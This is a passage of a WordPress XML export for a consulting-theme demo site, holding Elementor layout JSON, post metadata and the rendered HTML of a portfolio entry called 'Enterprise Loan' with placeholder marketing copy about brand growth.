2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"18475bca","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fa30e6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"44bd3c29","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"4348fe38","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5fa0d94e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a3a86ae","elType":"section","settings":[],"elements":[{"id":"3db2a24","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"94bb5a1","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a3dfcc1","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"de412fd","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb575a","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"fbefef1","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"18c8c09","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31a2bda","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"5c5b4ce","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"89ca01c","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b20476c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1bf0404","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"22e00d1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2f07a02","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e3e631d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fa9bb46","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"3025ea5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"28537dc","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"340df85","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"001e3e3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ec0117b","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"e75c6c1","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d235c7b","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"48d0caf","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[835]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Enterprise Loan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=830</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>January 12, 2018</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>830</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[enterprise-loan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[831]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[832]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"7adbf0ca","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"14f0c251","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"431e8d5","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"61d4ce9c","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"24904d7d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"771bc1d8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"21ed026b","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca6bc03","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"49ed3d5a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3fabd3ac","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"17e6f8b0","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"b60571d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"68f7ccb0","elType":"widget","settings":{"editor":"<p>January 12, 2018<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2502bf2","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"36dfc991","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25e1e05c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"5d14aed4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e1392f9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"b3e712b","elType":"section","settings":[],"elements":[{"id":"fa37e3d","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3fe9fee","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0a09dd9","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8f8beb7","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"5f88fbb","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"77810f4","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ffd781a","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? 